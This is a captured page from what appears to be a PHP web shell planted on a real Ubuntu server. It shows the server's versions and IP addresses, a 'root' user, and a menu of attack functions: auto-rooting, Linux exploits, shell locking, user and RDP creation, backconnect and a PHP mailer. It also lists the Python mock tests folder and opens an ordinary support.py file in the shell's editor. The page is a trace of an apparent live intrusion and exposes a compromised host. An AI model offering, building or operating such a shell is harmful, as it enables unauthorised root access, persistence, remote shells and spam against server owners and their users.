Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
mock /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
146
B
-rw-r--r--
__main__.py
623
B
-rw-r--r--
support.py
552
B
-rw-r--r--
testcallable.py
4.33
KB
-rw-r--r--
testhelpers.py
28.03
KB
-rw-r--r--
testmagicmethods.py
16
KB
-rw-r--r--
testmock.py
49.29
KB
-rw-r--r--
testpatch.py
55.03
KB
-rw-r--r--
testsentinel.py
976
B
-rw-r--r--
testwith.py
10.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : support.py
import sys info = sys.version_info import unittest2 try: callable = callable except NameError: def callable(obj): return hasattr(obj, '__call__') with_available = sys.version_info[:2] >= (2, 5) def is_instance(obj, klass): """Version of is_instance that doesn't access __class__""" return issubclass(type(obj), klass) class SomeClass(object): class_attribute = None def wibble(self): pass class X(object): pass try: next = next except NameError: def next(obj): return obj.next()
Close